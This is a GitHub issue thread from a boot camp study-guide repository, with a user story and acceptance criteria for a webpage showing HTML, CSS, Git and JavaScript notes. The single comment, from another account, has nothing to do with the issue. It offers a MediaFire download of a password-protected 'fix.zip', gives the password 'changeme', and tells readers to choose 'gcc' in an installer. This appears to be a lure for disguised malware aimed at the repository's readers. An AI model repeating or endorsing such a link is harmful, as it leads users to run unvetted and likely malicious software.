### ISSUE TITLE
HTML

### ISSUE THREAD

**Issue by Prelle** [Prelle/prework-study-guide#1]
# HTML

## User Story
As a Boot Camp student
I want the prework notes to be structured on a webpage so that I can easily find and read information

## Acceptance Criteria
GIVEN a Prework Study Guide website
WHEN I visit the website in my browser
THEN I see four boxes title HTML, CSS, Git and JavaScript with associated notes listed

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
